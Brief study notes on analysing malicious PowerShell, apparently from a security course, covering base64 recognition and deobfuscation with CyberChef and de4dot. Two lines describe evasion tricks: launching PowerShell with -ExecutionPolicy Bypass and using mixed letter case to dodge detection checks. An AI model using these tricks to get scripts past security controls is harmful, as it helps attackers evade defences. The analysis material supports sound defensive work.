Powershell usage malicious
- To temporarily bypass the execution policy and run scripts in a single PowerShell session, we can specify the flag -ExecutionPolicy Bypass when starting PowerShell from Windows CMD or the Run dialog.
- You can use meme case to MAYBE bypass checks
- a good tale tell that a big long string is base64 is if it ends in ’=’ which is for padding
- move through the powershell and look to clean it up through deobfuscation. Replace variables with automated tools into things that make more sense
- cyberchef is an excellent tool
- de4dot is a good tool to try and deobfuscate a .net or .dll